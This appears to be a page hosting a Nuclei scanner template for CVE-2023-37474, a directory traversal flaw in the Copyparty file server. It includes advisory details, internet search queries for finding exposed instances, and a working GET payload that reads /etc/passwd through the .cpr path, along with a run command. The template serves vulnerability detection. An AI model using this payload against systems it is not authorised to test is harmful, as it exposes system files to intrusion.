Skip to content

Copyparty <= 1.8.2 - Directory Traversal

ID: CVE-2023-37474

Severity: high

Author: shankar acharya,theamanrawat

Tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project

Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the .cpr subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit 043e3c7d which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.

id: CVE-2023-37474
info:
name: Copyparty <= 1.8.2 - Directory Traversal
author: shankar acharya,theamanrawat
severity: high
description: |
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.
reference:
- https://github.com/9001/copyparty/
- https://www.exploit-db.com/exploits/51636
- https://nvd.nist.gov/vuln/detail/CVE-2023-37474
- http://packetstormsecurity.com/files/173822/Copyparty-1.8.2-Directory-Traversal.html
- https://github.com/9001/copyparty/commit/043e3c7dd683113e2b1c15cacb9c8e68f76513ff
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-37474
cwe-id: CWE-22
epss-score: 0.05882
epss-percentile: 0.93414
cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: copyparty_project
product: copyparty
shodan-query: http.title:"copyparty"
fofa-query: title="copyparty"
google-query: intitle:"copyparty"
tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project
http:
- method: GET
path:
- "{{BaseURL}}/.cpr/%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a004730450220519938104781cc50e97581285afc2f115fd82f69584a133673feb047661be98d022100f4852f832588ce2282abff6bc7717ac6e30edb3ccf05a6f19c59f4e682fffd67:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-37474.yaml"

View on Github